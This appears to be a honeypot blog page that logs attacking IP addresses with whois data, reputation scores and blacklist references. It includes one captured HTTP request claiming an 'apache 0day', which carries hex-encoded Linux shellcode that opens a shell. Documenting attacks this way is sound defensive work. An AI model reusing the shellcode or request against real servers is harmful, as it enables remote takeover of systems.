  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

89.248.168[.]139

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 89.248.168.139
  • BGP Prefix : 89.248.168.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated : 2006-07-11
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/89.248.168.139
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/89.248.168.139

5.28.182[.]161

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.182.161
  • BGP Prefix : 5.28.176.0/21
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/5.28.182.161
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.182.161
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203

118.98.104.21 - Morfeus Fucking Scanner

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

77.126.12.73 - masscan/1.0

77.126.12[.]73

    Whois Data (TeamCymru)
  • AS : 9116
  • IP : 77.126.12.73
  • BGP Prefix : 77.126.0.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2006-11-07
  • AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/77.126.12.73

Friday, 1 January 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80

END OF DATA

185.130.5[.]224

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.224
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists and is not just a marketing idea to gain Twitter followers) is not reflected by any entry in exploit-db.com or 0day.today.

UPDATE 2: (Thanks to @DanielRufde)

https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0